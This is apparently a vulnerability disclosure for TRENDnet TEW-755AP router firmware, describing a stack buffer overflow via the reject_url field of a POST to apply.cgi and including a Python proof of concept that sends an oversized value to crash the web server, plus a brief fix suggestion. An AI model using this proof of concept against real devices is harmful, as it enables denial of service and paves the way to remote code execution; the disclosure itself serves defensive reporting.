We found a stack buffer overflow vulnerability at **TEW-755AP (**Firmware version TEW755AP-FW113B01.bin).

In the handler function for action reject (sub_41BD60) of the file /www/cgi/ssi, the value of reject_url is directly copied to stack buffer v25 without size check. An attacker can specify the input as a very long string in the post data and send the POST Request to apply.cgi to overflow the stack buffer, and finally can perform a Remote Code Execution attack.

PoC

import requests

url = "<http://192.168.17.221:80/apply.cgi>"
cookie = {"Cookie":"uid=1234"}
data = { 
    'action' : "reject",
    "login_name" : "a",
    "login_pass" : "a",
    "login_n"    : "a",
    "log_pass"   : "a",
    "html_response_page" : "reject.html",
    "reject_url" : "a" * 0x1000 
}
response = requests.post(url, cookies=cookie, data=data)
print(response.text)
print(response)

We use python to send a crafted HTTP post request to the web server, and print out the return message.

Send the crafted HTTP request to the server, it will return 502 error code. This is because the stack buffer is overflowed by the input “aaaaaaaaaaaaaaaaaa…”. If it’s a malicious shellcode then the system will be controlled by the attacker.

Fix Suggestion:

Use strncpy to perform avoid buffer overflow